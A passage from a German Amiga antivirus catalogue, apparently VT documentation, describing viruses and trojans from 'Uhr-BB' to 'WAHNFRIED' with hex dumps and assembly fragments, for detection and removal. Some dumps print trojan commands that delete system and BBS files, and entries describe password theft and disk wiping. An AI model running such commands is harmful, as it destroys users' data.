  6774.       mit dem Prg. vorsichtig. Es koennte noch ein Trojan im Prg. sein !
  6775.  
  6776.    - UF-Virus   anderer Name: UltraFox  s.u.
  6777.  
  6778.    - Uhr-BB  Virus      Cool DoIo $6c
  6779.         Speicherlage: abhaengig vom Inhalt $4e(a6) minus $800
  6780.         Fordert trackdisk.device NICHT
  6781.         KS2.04: Nein, da Routine Speicher schon verseucht $6c+1 auf
  6782.             kleiner $FC testet.
  6783.         BB wird decodiert mit eor.b d0,d2 usw.
  6784.         Namensbegruendung: Da kein Text gefunden wurde, wurde ein
  6785.         Schadensfall (s.u.) fuer den Namen herangezogen.
  6786.         Vermehrung: BB
  6787.         - Test ob BB schon verseucht
  6788.         - Neue Codierung mit eor.b d2,d1 (Dx zu Decodierung anders).
  6789.           Der Startwert von d2 wird mit $BFE801 festgelegt.
  6790.         Schaeden:
  6791.         Enthaelt mehrere Zaehlzellen. Eine Zaehlzelle wird auf 0-6
  6792.         getestet.
  6793.           z.B. Wert 2
  6794.           addq.b #3,D80002    (Namensbegruendung!!!)
  6795.           Addiere 3 Sekunden. Diese Speicherstelle stimmt aber nach
  6796.           meinem Wissensstand nur fuer den A2000A . Fuer den A2000B
  6797.           waere die richtige Speicherstelle $DC0000 .
  6798.           z.B. Wert 3
  6799.           erhoehe VHPOSR um $300
  6800.           z.B. Wert 4
  6801.           Wartezaehlschleife mit $B000
  6802.           z.B. Wert 5
  6803.           Mauspos -$605
  6804.           usw.
  6805.  
  6806.    - ULDV8   kein Fastmem, KickTag, KickCheckSum, BeginIo, IntVec 5
  6807.          im BB sichtbar: ULDV8
  6808.          fordert trackdisk.device
  6809.          Vermehrung:BB
  6810.  
  6811.    - ULog V1.8   siehe bei Devil_11_B.Door
  6812.  
  6813.    - ULOG.X     BBS-Bomb   siehe oben bei scan.x
  6814.  
  6815.    - UltraFox       Cool, im Prg. DoIo, FastMem ja,
  6816.          kennzeichnet eigenen Speicher NICHT als belegt
  6817.          fordert trackdisk.device nicht
  6818.          Vermehrung: ueber BB
  6819.          im Speicher immer ab $7eb00
  6820.          Zaehlzelle groesser $f = Textausgabe, Graphikroutine
  6821.          Hintergrund dunkelblau, Balken hellblau, Schrift gelb.
  6822.          Greetings from ULTRAFOX of Aust.
  6823.  
  6824.    - Umyj Dupe   nur KS1.2, da absoluter DoIo-ROM-Einsprung
  6825.          KickTag, KickCheckSum, DoIo, immer ab $7F800
  6826.          Fordert trackdisk.device nicht !!!
  6827.          Schaeden und Vermehrung:
  6828.          Bootblock
  6829.          Schreibt in Block 880 (ist nur bei DD-Disk der RootBlock)
  6830.             Umyj Dupe   usw.
  6831.          DisplayAlert:
  6832.             Umyj Dupe   usw.
  6833.  
  6834.    - Unkown-Virus   BB
  6835.         Stand: 23.08.94
  6836.         Einige AntiVirusPrge erkennen einen Unkown-Virus. ( (1) oder (2) )
  6837.         Das stimmt NICHT.
  6838.         VT erkennt Noboot (seit 02.11.90 !!!!)
  6839.         Lesen Sie bitte nach bei VT-andere.BB unter Noboot. Danke
  6840.         Vielleicht aendern die anderen AntiVirusProgrammee die Meldung
  6841.         beim naechsten Update.
  6842.  
  6843.    - UNLZX-Trojan   siehe bei GoTcHa-Trojan
  6844.  
  6845.    - UnpackJPEG-Trojan     Zerstoerung
  6846.          Verbogene Vektoren: keine
  6847.          Nicht Resetfest
  6848.          Filename: UnpackJPEG       27856 Bytes
  6849.          VT bietet nur Loeschen an
  6850.          Am Ende des Files ist zu lesen:
  6851.            33393230 62000000 002d433a 52756e20 3920b....-C:Run
  6852.            3e4e494c 3a20433a 44656c65 7465203e >NIL: C:Delete >
  6853.            4e494c3a 20424253 3a4d4158 73424253 NIL: BBS:MAXsBBS
  6854.            2e436f6e 66696700 00000014 4465636f .Config.....Deco
  6855.            64696e67 20746f20 5359533a 542e2e20 ding to SYS:T..
  6856.            0000001f 433a5275 6e203e4e 494c3a20 ....C:Run >NIL:
  6857.            433a4465 6c657465 203e4e49 4c3a2053 C:Delete >NIL: S
  6858.            3a233f00 0000001f 433a5275 6e203e4e :#?.....C:Run >N
  6859.            494c3a20 433a4465 6c657465 203e4e49 IL: C:Delete >NI
  6860.            4c3a2043 3a233f00 00000023 4a504547 L: C:#?....#JPEG
  6861.            20486561 64657220 666f756e 64206f6e  Header found on
  6862.            2066696c 65206043 4a532e4a 50472700  file `CJS.JPG'.
  6863.            00000026 433a5275 6e203e4e 494c3a20 ...&C:Run >NIL:
  6864.            433a4465 6c657465 203e4e49 4c3a2042 C:Delete >NIL: B
  6865.            42533a54 6578742f 233f0000 00184578 BS:Text/#?....Ex
  6866.            65637574 696e6720 4a504547 20766965 ecuting JPEG vie
  6867.            7765722e 2e2e0000 0022433a 52756e20 wer......"C:Run
  6868.            3e4e494c 3a20433a 44656c65 7465203e >NIL: C:Delete >
  6869.            4e494c3a 204c4942 533a233f 00000003 NIL: LIBS:#?....
  6870.  
  6871.    - USSR492-Virus   BB   Excrement-Clone (Texte geaendert)
  6872.          anderer Name: Sentinel siehe oben
  6873.          Es wird auch der Name USSR 492 verwendet, da aber auf "Sent"
  6874.          im Virus selbst getestet wird, halte ich den Namen Sentinel
  6875.          fuer sinnvoller, zumal dieser Name auch an gleicher Stelle
  6876.          wie EXCREMENT im Original steht.
  6877.  
  6878.    - V1  BB   siehe oben bei EXECUTORS.BB
  6879.  
  6880.    - VC-MakeKey-Trojan    siehe bei WiREFACE-Trojan
  6881.  
  6882.    - VCCofTNT-Virus  BB
  6883.          Graphikausgabe:
  6884.                VCC of TNT
  6885.             ACCESS FORBIDDEN
  6886.          Schreibt VCC9 nach #34(a6)
  6887.          Fordert trackdisk.device NICHT
  6888.          auch KS2.04
  6889.          Schaeden:
  6890.          Schreibt sofort unsinnige Werte aus dem Speicher in den BB
  6891.          und den Root-Block
  6892.          Ergebnis: Not a Dos Disk
  6893.          Empfehlung: sofort loeschen
  6894.          Wird auch als AutoBootingBootProtector V2.0 weitergegeben.
  6895.          Typ 2: Eine technische Meisterleistung. Bravo
  6896.          VCC9 wurde durch $k.. ersetzt.
  6897.                     Orig                       Umbau
  6898.               56434339 002220fc VCC9." .  246bbfd0 002220fc $k..." .
  6899.               ^^^^^^^^                    ^^^^^^^^
  6900.          Die dos.lib wurde an eine andere dafuer aber UNGERADE Stelle im
  6901.          BB verschoben. Das mag der 68000 besonders gerne.
  6902.               00324e75 646f732e .2Nudos.  010f0777 00ef0f00 ...w....
  6903.                        ^^ gerade
  6904.               ff8f03df fc7dffcf ........  4c4c2164 6f732e6c LL!dos.l
  6905.                                                 ^^ ungerade
  6906.  
  6907.    - VERA    File  s.u. bei AntiVirusPrg
  6908.          Ist KEIN Virus !!!! Das Teil macht NICHTS (!!!!) OHNE Rueck-
  6909.          frage.
  6910.  
  6911.  
  6912.    - Vermin  Cool, im Prg DoIo  immer ab $7eb10
  6913.          fuellt nicht benoetigten Platz im BB mit Inhalt von $DFF006 auf.
  6914.          Vermehrung und Schaden: Bootblock
  6915.  
  6916.    - Viewtek22-Installer      File
  6917.          Laenge ungepackt: 93844 Bytes (so liegt er im lha-Archiv)
  6918.          Namensbegruendung: Wird als Viewtek22.lha weitergegeben.
  6919.          keine verbogenen Vektoren
  6920.          Es wurden 2 Hunks an das Original-Viewtek2.1-Prg (Laenge 88944
  6921.          Bytes) angelinkt.
  6922.          Die Programmteile sind teilweise mehrfach codiert.
  6923.          VT versucht beide Hunks auszubauen.
  6924.  
  6925.          1.Hunk: Es duerfte sich um ein Programmteil handeln, das Ver-
  6926.          aenderungen an einer Mailbox vornimmt. FastCall ????
  6927.          vgl. auch LHAV3-BBS-Trojan s.o.
  6928.          Verlaengert ein File um #864 Bytes
  6929.          Keine verbogenen Vektoren
  6930.          Keine Vermehrungsroutine
  6931.          Wird von VT mit 2.Hunk ausgebaut.
  6932.                 Auszug aus dem 1.Hunk (ist uncodiert zu lesen):   
  6933.               533a4861 75707450 66616400 55736572 S:HauptPfad.User
  6934.               2f537973 4f702f55 73657244 6174656e /SysOp/UserDaten
  6935.               00426f78 44617465 6e2f426f 78506172 .BoxDaten/BoxPar
  6936.               616d6574 65720055 7365722f 4b6f7761 ameter.User/Kowa
  6937.               6c736b79 2f2e494e 44455800 55736572 lsky/.INDEX.User
  6938.               2f4b6f77 616c736b 792f2e54 58540041 /Kowalsky/.TXT.A
  6939.               6273656e 64657220 203a204b 46557365 bsender  : KFUse
  6940.               72436865 636b0a42 65747265 66662020 rCheck.Betreff
  6941.          2.Hunk: Das Virusteil
  6942.          Startet ein Task-Programm s.u.
  6943.          Versucht sich an andere Programme zu linken s.u.
  6944.          Hinweis eines Anwenders zum 1.Hunk (Juli 95): Danke
  6945.          1. Auslesen des Hauptpfades
  6946.          2. Auslesen des SysopPsw.
  6947.          3. Auslesen des Dospsw.
  6948.          4. Schreiben der Psw. an den User Kowalsky
  6949.          (KFUserCheck ist ein Tool der Programmiertruppe "Krypton Force")
  6950.  
  6951.  
  6952.    - Viewtek22-Virus
  6953.          KEINE verbogenen Vektoren
  6954.          Startet ein Task-Programm s.u.
  6955.          Versucht sich als 1.Hunk vor andere Programme zu linken.
  6956.          Typ A:
  6957.          Verlaengerung der Programme um 4036 Bytes.
  6958.          Typ B:
  6959.          Verlaengerung der Programme um 4504 Bytes.
  6960.          Sonst keine Schaeden festgestellt.
  6961.          Das Teil hat bei mir NIE eine Meldung ausgegeben.
  6962.          Betroffene Programme (alle im C-Verz.) :
  6963.                 Fileauszug decodiert:
  6964.                        0063 3a7a6f6f 00633a73       .c:zoo.c:s
  6965.           6872696e 6b00633a 69707265 66730063 hrink.c:iprefs.c
  6966.           3a6d6f75 6e740063 3a646d73 00633a73 :mount.c:dms.c:s
  6967.           65747061 74636800 633a7665 7273696f etpatch.c:versio
  6968.           6e00633a 6c686172 6300633a 61726300 n.c:lharc.c:arc.
  6969.           633a6661 73746769 6600633a 76740063 c:fastgif.c:vt.c
  6970.           3a73686f 7700633a 70707368 6f770063 :show.c:ppshow.c
  6971.           3a656400 633a6963 6f6e7800          :ed.c:iconx.
  6972.          Eine Doppelverseuchung soll vermieden werden.
  6973.              Auszug aus der Routine:
  6974.                   eor.l d1,d0
  6975.                   eor.l d2,d0
  6976.                    bne.s ....
  6977.          Diese Routine verhindert (nicht geplant) aber auch die
  6978.          Erstverseuchung von einigen Files (wurde zufaellig ent-
  6979.          deckt beim Versuch mit arc). Einige arc-Versionen wur-
  6980.          den nicht verseucht.
  6981.          Ablauf:
  6982.           Die Filenamensliste (s.o.) wird durchlaufen.
  6983.            Mindestens 9 Blocks frei
  6984.            Medium ist validated
  6985.            File ist ausfuehrbar ($3f3)
  6986.            Filegroesse max. #143360 Bytes
  6987.           Das Protection-LW wird gerettet  (NEU!!!)
  6988.           Das Virusteil wird als 1.Hunk angelinkt.
  6989.           Die folgenden Hunks werden nachgebessert. Da das Teil nicht
  6990.           viele Hunktypen kennt, muss damit gerechnet werden, dass
  6991.           nicht alle verseuchten Files in ALLEN Funktionen arbeits-
  6992.           faehig sind. VT versucht beim Ausbau den Originalzustand
  6993.           wieder herzustellen.
  6994.           File wird zurueckgeschrieben.
  6995.           Gerettetes Protection-LW wird zurueckgeschrieben. (NEU !!!)
  6996.           Falls mind. KS 37, dann wird das Ursprungs-File-Datum mit
  6997.           setfiledate zurueckgeschrieben. (NEU !!!!)
  6998.           Sie koennen also bei der schnellen Durchsicht des C-Ver-
  6999.           zeichnisses ein verseuchtes File nur noch an der Laenge er-
  7000.           kennen und nicht mehr am Datum oder den Protection-Flags.
  7001.  
  7002.    - Viewtek22-Task
  7003.           Name: trackdisk.device  s.u.
  7004.           Wenn Sie also nur ein Disk-LW haben und dennoch zweimal
  7005.           trackdisk.device in der taskliste finden, dann sollten
  7006.           Sie vorsichtig werden.
  7007.           VT versucht das Teil abzuschalten. Sie muessen aber mit
  7008.           einem GURU rechnen.
  7009.           Das Teil selbst aendert sich von Process in Task.
  7010.                    move.b #$1,$8(a0)
  7011.           Grund: unbekannt
  7012.           Nach einem dosdelay (#500), wird jeweils die TaskReady- und
  7013.           TaskWait-Liste durchsucht.
  7014.           Untersucht wird dabei immer $58(a0)  = tc_UserData
  7015.           Ich kenne jetzt EIN Programm, das diesen Zeiger verwendet.
  7016.           Das Viewtek22-Task-Teil schreibt in tc_UserData einen Wert,
  7017.           um sich selbst zu erkennen. Damit wird verhindert, dass bei
  7018.           einem neuen Aufruf des Viewtek22-Virus-Teils neben der Ver-
  7019.           mehrung noch ein trackdisk.device installiert wird.
  7020.           Sonst habe ich KEIN Programm gefunden, das diesen Zeiger
  7021.           verwendet. Ich bitte Sie also um Mithilfe.
  7022.           Sollte tc_UserData leer sein oder das eigene LW enthalten, dann
  7023.           wird in der Taskliste weitergesucht.
  7024.           Der Zeiger in tc_UserData zeigt auf einen Speicherbereich.
  7025.           Dieser Bereich wird nun weiter getestet:
  7026.                         cmp.l #$60064ef9,(a1)
  7027.                         bne ...
  7028.                         cmp.w #$4ef9,$8(a1)
  7029.                         bne ...
  7030.                         move.l $a(a1),d2
  7031.                         sub.l $4(a1),d2
  7032.                         cmp.l #$1e8,d2
  7033.                         bne ...
  7034.           Bitte, wer kennt solche Programme. Ich lerne gern etwas dazu.
  7035.           Meine Vermutung geht in Richtung Mailbox-Prg oder Utility ??
  7036.           Um Ihnen die Suche zu erleichtern, habe ich noch einige Task-
  7037.           teile decodiert (Nicht alle). Vielleicht helfen Ihnen die
  7038.           Texte weiter. Mir sagen sie nichts. Ich vermute, dass in ein
  7039.           Mailbox-Prg eingegriffen werden soll ???
  7040.               decodierte Taskteile:
  7041.                             3151415a 32575358         1QAZ2WSX
  7042.           33454443 3452460a 3151415a 32575358 3EDC4RF.1QAZ2WSX
  7043.           33454443 3435360a                   3EDC456.
  7044.               ;.....
  7045.                                 3151 415a3257           1QAZ2W
  7046.           53583345 44433452 460a3151 415a0a53 SX3EDC4RF.1QAZ.S
  7047.           59535445 4d454245 4e450a45 4449540a YSTEMEBENE.EDIT.
  7048.  
  7049.               decodierter Taskname im Virusteil:
  7050.           62726172 79007472 61636b64 69736b2e brary.trackdisk.
  7051.           64657669 636500                     device.
  7052.  
  7053.  
  7054.    - VIPHS-Virus   BB   BeginIo, Kicktag, KickCheckSum, Vec5, im Prg $6c
  7055.          KS2.04: nein
  7056.          Versucht zu taeuschen im BB durch:
  7057.             ANTIVIRUS 1989 by VIPHS
  7058.          Verwendet den ByteBandit-Code um $20 verschoben und $6c
  7059.          Auswirkungen s.o. bei ByteBandit
  7060.  
  7061.    - VirConSet-Virus  BB   (VirusConstructionSet)
  7062.          immer ab $7F000, Cool $7F0BE, DoIo $7F0D2
  7063.          Fordert trackdisk.device NICHT
  7064.          Schaeden und Vermehrung:
  7065.          in Abhaengigkeit von der Zaehlzelle (5) wird
  7066.           - ein Virus-BB geschrieben oder
  7067.           - mit DisplayAlert ein Text ausgegeben. Schwachpunkt: Intuition-
  7068.             Base wird immer im $C00000-Bereich abgelegt.
  7069.          Die schlimmste Sache:
  7070.          Der BB wird mit dem Programm Virusconstructionset erzeugt.
  7071.          Laenge gepackt (PP): 10192 Bytes
  7072.          Sie werden aufgefordert, einen max 60 Zeichen langen Display-
  7073.          Alert-Text einzugeben. Den erzeugten BB koennen Sie dann auf
  7074.          Disk in DF0: abspeichern.
  7075.          Weiterhin ist noch ein codierter (addi.b #$27,(a0)+) Text im
  7076.          BB vorhanden, der NIE erreicht wird:
  7077.                                  5468 69732056           This V
  7078.            69727573 20776173 206d6164 65207769 irus was made wi
  7079.            74682053 7461724c 69676874 60732056 th StarLight`s V
  7080.            69727573 436f6e73 74727563 74696f6e irusConstruction
  7081.            73536574 2120636f 64656420 6279204d sSet! coded by M
  7082.            41580000                            AX..
  7083.  
  7084.    - VirConSet2-Virus    BB
  7085.          Cool und nach Reset DoIo
  7086.          KS1.3 : ja
  7087.          Fordert trackdisk.device NICHT
  7088.          Schaeden und Vermehrung:
  7089.          Typ A: BB uncodiert
  7090.          Typ B: BB codiert mit  eori.b d0,(a0)+  (immer gleich)
  7091.          Test auf Cool schon verbogen
  7092.          Speicherbedarf mit AllocMem
  7093.          Vermehrung mit DoIo falls lesend auf Block 880 (ist nur bei
  7094.          DD-Disk Rootblock) zugegriffen wird.
  7095.          Falls die Zaehlzelle $7FFF0 den Wert 5 erreicht hat, wird
  7096.          mit DisplayAlert ein Text (mit VirusConstructionSet 2 fest-
  7097.          gelegt) ausgegeben.
  7098.          Weiterhin ist noch ein codierter (eori.l #$aaabacad,(a0)+)
  7099.          Text im BB vorhanden, der NIE erreicht wird:
  7100.                                  2054 68697320            This
  7101.            56495255 53207761 73206372 65617465 VIRUS was create
  7102.            64207769 74682074 68652056 49525553 d with the VIRUS
  7103.            20434f4e 53545255 4354494f 4e205345  CONSTRUCTION SE
  7104.            54204949 2020414c 4c20436f 64652062 T II  ALL Code b
  7105.            79204d61 78206f66 20537461 724c6967 y Max of StarLig
  7106.            68742032 322f342f 31393933 21212100 ht 22/4/1993!!!.
  7107.  
  7108.          Erzeuger: VirusConstructionSet 2
  7109.  
  7110.    - VIRI-Virus  BB    s.o. bei F.I.C.A-VIRI-Clone
  7111.          Nur Text geaendert
  7112.  
  7113.    - VIRUS FIGHTER V1.0  BB  auch mit KS2.04 VKill-Clone   s.u.
  7114.          Prg-Code = VKill
  7115.          DecodierLW geaendert: "1991"  (nuetzt bei VT NICHTS!! )
  7116.          decodierter Text fuer Requester anders:
  7117.             VIRUS FIGHTER V1.0  usw.
  7118.  
  7119.    - VirusHunter (L)   File
  7120.          Empfehlung: loeschen    Laenge gepackt:   2888 Bytes
  7121.                                  Laenge ungepackt: 4528 Bytes
  7122.          Im File ist ungepackt zu lesen:
  7123.            001b0a0d 57656c63 6f6d6520 746f2048 ....Welcome to H
  7124.            61726477 6172652d 56697275 732d4875 ardware-Virus-Hu
  7125.            6e746572 0a0d5665 7273696f 6e203130 nter..Version 10
  7126.            2e323020 6f6e2032 312e3037 2e393220 .20 on 21.07.92
  7127.              ;.....
  7128.            0a0d4368 65636b69 6e672052 6f6d2d56 ..Checking Rom-V
  7129.            656b746f 7273202e 2e2e2052 6f6d2069 ektors ... Rom i
  7130.            7320696e 66656374 65642121 210a0d53 s infected!!!..S
  7131.              ;usw.
  7132.          Hinweis: Im gepackten Zustand koennte es zu Fehlerkennungen
  7133.                   kommen.
  7134.                   Soll ein Gag-Programm sein. Neulinge im Amigabereich
  7135.                   duerften darueber eine andere Meinung haben.
  7136.          Fundort z.B.:
  7137.          CD-Aminet5:AMINET/GAME/GAG/VIRUSHUNTER.LZH
  7138.  
  7139.    - VIRUS PREDATOR BB: anderer und eigentlich falscher Name: Julie s.o.
  7140.  
  7141.    - VIRUS TERMINATOR V6.0    trojanisches Pferd  Mega1-Cr: 1880 Bytes
  7142.                auch KS2.04
  7143.          Versucht durch Text zu taeuschen:
  7144.             VIRUS TERMINATOR V6.0 by Rudolf Neiber (1992)  usw.
  7145.          Installiert in Wirklichkeit im Speicher CHEATER HIJACKER Virus-BB
  7146.             Wird von VT im Speicher als CHEATER HIJACKER erkannt.
  7147.             Sollte von VT im FileTest als VIRUS TERMINATOR 6 erkannt wer-
  7148.             den.
  7149.          Empfehlung: sofort loeschen
  7150.  
  7151.    - Virus V1    immer ab $7EC00  Cool $7ec62, DoIo $7eca8
  7152.          Arbeitet auch mit KS2.04 !
  7153.          Fordert trackdisk.device NICHT !!!
  7154.          Schaeden und Vermehrung:
  7155.          ueber Bootblock
  7156.          sobald die Zaehlzelle den Wert $F erreicht hat:
  7157.          Textausgabe mit Graphics-Routinen
  7158.             dunkler Hintergrund
  7159.             Virus V1 (rot)
  7160.             Wir sind wieder da ahaaa.. (gruen)
  7161.          Der letzte Text ist auch im BB zu lesen
  7162.  
  7163.    - Virusblaster V2.3   ungepackt 9232 Bytes
  7164.          keine Vermehrung, keine Vektoren verbogen,
  7165.          (also von der Definition her KEIN Virus, aber auf Zerstoerung
  7166.          ausgelegt)
  7167.          zerstoert Disk in Df0
  7168.          meldet sich im Cli als AntiVirenProgramm von M&T 7/91
  7169.          einfach loeschen
  7170.          Herkunft: Virusblaster.LZH  27944 Bytes
  7171.             - Doc-File (geaendertes VT2.26doc-File)
  7172.             - Virusblaster   PP   7292 Bytes
  7173.  
  7174.    - virustest    anderer Name: TimeBomber  s.o.
  7175.  
  7176.    - VirusZ1.02  File  Laenge ungepackt: 1148  Clone
  7177.          siehe oben bei CompuPhagozyte 2
  7178.          Hinweis: a) Die Versionsnummer gibt es am 27.12.93 noch gar
  7179.                      nicht.
  7180.                   b) Die Laenge muss das Prg. sofort verraten.
  7181.  
  7182.  
  7183.    - visions-Trojan    Zerstoerung
  7184.          siehe bei: TRUSTNOONE-Trojan
  7185.  
  7186.    - VKill 1.0     anderer Name: Aids, veraendert PutMsg
  7187.            mit FastMem:
  7188.   (loescht j e d e n nicht schreibgeschuetzten Bootblock o h n e Warnung !!!,
  7189.                     auch wenn es ein Orig. Bootblock ist !! )
  7190.            mit nur ChipMem:
  7191.      (schreibt ohne Warnung eigenen Bootblock)
  7192.          EntschluesselungsLW: " KEN"
  7193.  
  7194.    - VMK3.0-Trojan    File  Laenge: 2620 Bytes
  7195.          Sofort loeschen
  7196.          Keine verbogenen Vektoren
  7197.          Keine Vermehrung
  7198.          Versucht durch Cli-Text zu taeuschen.
  7199.          Im File ist zu lesen:   
  7200.           009b3333 6d566972 75734d65 6d4b696c ..33mVirusMemKil
  7201.           6c205633 2e303020 a9204368 72697320 l V3.00 . Chris
  7202.           48616d65 739b6d00 0a436f6c 64436170 Hames.m..ColdCap
  7203.               ;.....
  7204.           00736373 692e6465 76696365 00000b0f .scsi.device....
  7205.          Schadensablauf:
  7206.            Es wird versucht scsi.device Unit 0 zu oeffnen.
  7207.            (d.h. gvpscsi.device u.a. sind NICHT betroffen)
  7208.            a)  Falls nein Vektorausgabe in Cli
  7209.            b)  Falls ja:
  7210.            Block 0 der Festplatte wird eingelesen.
  7211.            Die BlockChecksum wird um 1 erhoeht und das Byte an Stelle
  7212.            $2b um 1 vermindert. Diese Stelle liegt in einem reservierten
  7213.            Bereich (6 Langworte mit je FFFFFFFF). Sollte das Byte $2b
  7214.            noch nicht 0 sein, so wird nur der Block zurueckgeschrieben.
  7215.            (siehe Testauszug unten). Da die Stelle $2b im Moment keine
  7216.            Bedeutung fuer den Hostadapter hat, faellt dem User nichts auf.
  7217.            ABER !!!!
  7218.            Sobald die Stelle $2b den Wert 0 erreicht, wird der Rigid-
  7219.            bereich auf einer Laenge von $19000 = #102400 Bytes ueber-
  7220.            schrieben. Folge: nach dem naechsten Reset bootet ihre Fest-
  7221.            platte nicht mehr.
  7222.            Abhilfe: Da Sie vorsichtig sind, haben Sie natuerlich von dem
  7223.            Rigid-Bereich mit VT ein Backup gezogen, das Sie jetzt zurueck-
  7224.            spielen koennen.
  7225.            Da erwartet wird, dass Sie VMK in die startup-sequence ueber-
  7226.            nehmen (laut Doc), haben Sie 255 Resets frei, bevor das Un-
  7227.            glueck beginnt.
  7228.            Testauszuege mit VT:
  7229.            Rigid-HD-BB-Orig:
  7230.             0000: 5244534b 00000040 334d4847 00000007 RDSK...@3MHG....
  7231.                                           ^^
  7232.             0010: 00000200 00000012 ffffffff 00000001 ................
  7233.             0020: 00000003 ffffffff ffffffff ffffffff ................
  7234.                                           ^^
  7235.            Rigid-HD-BB nach 1.Aufruf:
  7236.             0000: 5244534b 00000040 334d4848 00000007 RDSK...@3MHH....
  7237.                                           ^^
  7238.             0010: 00000200 00000012 ffffffff 00000001 ................
  7239.             0020: 00000003 ffffffff fffffffe ffffffff ................
  7240.                                           ^^  
  7241.            Rigid-HD-BB nach 2.Aufruf:
  7242.             0000: 5244534b 00000040 334d4849 00000007 RDSK...@3MHI....
  7243.                                           ^^
  7244.             0010: 00000200 00000012 ffffffff 00000001 ................
  7245.             0020: 00000003 ffffffff fffffffd ffffffff ................
  7246.                                           ^^
  7247.             usw. .....
  7248.         Hinweis 97-06-29:
  7249.             Es ist ein neues File aufgetaucht.
  7250.             Filename: patch
  7251.             Filelaenge: 2620 Bytes
  7252.             nach FileID: AMIRC 1.53 BETA PATCH
  7253.             Es wurden einige Bytes veraendert.
  7254.             Folge: Das Teil zerstoert jetzt SOFORT !!!!!!
  7255.  
  7256.  
  7257.    - VoxelSvind-Trojan        Zerstoerung
  7258.         Filename: Voxel_Svind.exe
  7259.         Filelaenge: 179860 Bytes
  7260.         Kein verbogener Vektor
  7261.         Nach File-ID: .our.new.demo.  VOXEL SVIND!
  7262.         Am Ende des Files ist zu lesen:
  7263.             2e6c6962 72617279 00000000 00047379 .library......sy
  7264.             733a0000 00012f00 00000005 6c696273 s:..../.....libs
  7265.             3a000000 00012f00 00000002 6c3a0000 :...../.....l:..
  7266.             00012f00 00000002 633a0000 00012f00 ../.....c:..../.
  7267.             00000002 733a0000 00012f00 00000001 ....s:..../.....
  7268.         Ablauf:
  7269.         (Entsprechende Graphikeinstellung vorausgesetzt) Dunkler Hinter-
  7270.         grund, sehr grosse blaue Buchstaben "DEPTH", darunter kleiner
  7271.         mit hellen Buchstaben loading...
  7272.         Zerstoerungsergebnis:
  7273.           Directory "Trashcan"
  7274.             yv{huykviglg                      736
  7275.             rmfy{zxgwdnmhlf                   384
  7276.             wgi{fyiwqyqn                      696
  7277.             ezmuqcpejzohs{xzogdiyrswofufc     380
  7278.             kovjlxrcplq                       340
  7279.             dhnd{tc{mesmmc{onneqosi          1848
  7280.             vuspovrqwot                     17100
  7281.             hjvzxdfnqcyejouxnmkjsx           4964
  7282.             unimurzgmmvisqfgttgjctppodook    5688
  7283.             jlwhtgzpsihgqrzsxhjrvfmcecrcr   18012
  7284.             oiluciiyyki                     39000
  7285.           Directory "libs"
  7286.             xh{rpqlwkph                      2788
  7287.             pnfluhvycwqjsdvjklcu             1876
  7288.           Directory "l"
  7289.             xltiv{senfdsynsjelmkeenxo         876
  7290.             nodxykzogxpvnjcolqpnds           1756
  7291.             mgevumvxuexdoio                   992
  7292.             wgsjkhzjjvepihxlywql             2804
  7293.             rcvkhmlzn{dcnygupoqkyst          3412
  7294.             rceiwppeiellllyckrjkz            3112
  7295.             ome{wkfd{xycrjmxeu               6464
  7296.             sxyls{eelkioxwd                     7
  7297.           Directory "s"
  7298.             qy{vuzxtkduulejryw{qjql          1364
  7299.           Directory "c" is empty
  7300.         Es werden also die Filenamen geaendert. Weiterhin werden Files
  7301.         zwischen den Subdirs verschoben. Beispiele: Trashcan war vor dem
  7302.         Test leer und c: enthielt mehrere Files. Oder: Das File in l:
  7303.         mit der Laenge 7 ist in Wirklichkeit die startup-sequence und
  7304.         war in s: . Die Files werden also aus bestimmten Subdirs (s.o.)
  7305.         geholt und teilweise in beliebigen Subdirs (bei mir z.B. Trashcan
  7306.         und/oder devs) abgelegt. Ich sehe da keine Reparaturmoeglichkeit,
  7307.         die in einem "vernuenftigen" Zeitaufwand durchfuehrbar ist.
  7308.         VT bietet fuer VoxelSvind-Trojan Loeschen an.
  7309.  
  7310.  
  7311.    - VScan-BBS-Trojan    File  Loeschen
  7312.         Filename: vscan
  7313.         KEINE Vermehrung
  7314.         KEINE verbogenen Vektoren
  7315.         Laenge: 37896 Bytes
  7316.         Fundort z.B.:  CD-SAAR2:ARCHIVE/200_299/SAAR_203.LHA
  7317.         Mit der 4EB9-Methode wurde vor VScan ein Teil gelinkt, das
  7318.         BBS manipulieren soll.
  7319.         Trojanteil gepackt:  5344 Bytes
  7320.         Trojanteil entpackt: 8140 Bytes
  7321.         Im entpackten Trojanteil ist zu lesen:
  7322.                                        42425300             BBS.
  7323.             44483000 44483100 44483000 44483100 DH0.DH1.DH0.DH1.
  7324.             4242533a 00444830 3a424253 2f004448 BBS:.DH0:BBS/.DH
  7325.             313a4242 532f0044 48303a00 4448313a 1:BBS/.DH0:.DH1:
  7326.             ;......
  7327.             803c6600 fdc04e5d 4e752573 436f6e66 .<f...N]Nu%sConf
  7328.             69672564 00720025 734d7367 42617365 ig%d.r.%sMsgBase
  7329.             2f486561 64657266 696c6500 61005000 /Headerfile.a.P.
  7330.             25737573 65722e64 61746100 72002573 %suser.data.r.%s
  7331.             4d736742 6173652f 31006100 43752073 MsgBase/1.a.Cu s
  7332.         Es koennte sich um eine DEVIL-Variante (siehe oben) handeln.
  7333.         VT bietet nur loeschen an, da der VScan-Programmierer selbst
  7334.         in spaeteren Docs schreibt:
  7335.         5.05: *** WARNING *** This is a bogus version not made by myself!
  7336.               Avoid this one at all costs!
  7337.  
  7338.  
  7339.    - VT-Faster Virus   File  CompuPhagozyte 4 - Clone  s.o.
  7340.         So ein Programm habe ich nie geschrieben.
  7341.  
  7342.    - WAFT  BB   Cool, DoIo  auch mit KS2.04 Vermehrung
  7343.          Teile des BB`s codiert mit eori.b #-$31,(a0)+
  7344.             ergibt u.a. Text: W A F T  usw
  7345.          Vermehrung u. Schaeden:
  7346.             - BB
  7347.             - DisplayAlert
  7348.             - sucht Screen- u. Windowstruktur
  7349.  
  7350.    - WAHNFRIED  BB   Cool immer $7F0D8   PutMsg immer $7F0DE
  7351.          KS 2.06: ja
  7352.          fordert trackdisk.device  NICHT
  7353.          Namensbegruendung:
  7354.          im BB ist immer zu lesen
  7355.            20574148 4E465249 45442053 5452494B  WAHNFRIED STRIK
  7356.            45532041 4741494E 20212120 20202020 ES AGAIN !!
  7357.          Vermehrung:
  7358.         ueber BB
  7359.            Allerdings ist ein vermehrter BB nicht mehr bootfaehig,
  7360.            da die BB-CheckSum nicht nachgebessert wird.
  7361.          Schaeden:
  7362.        Eine Zaehlzelle wird bei der Aktivierung des Viruses mit
  7363.            dem Wert $14 beschrieben. Sobald in der Zaehlzelle der
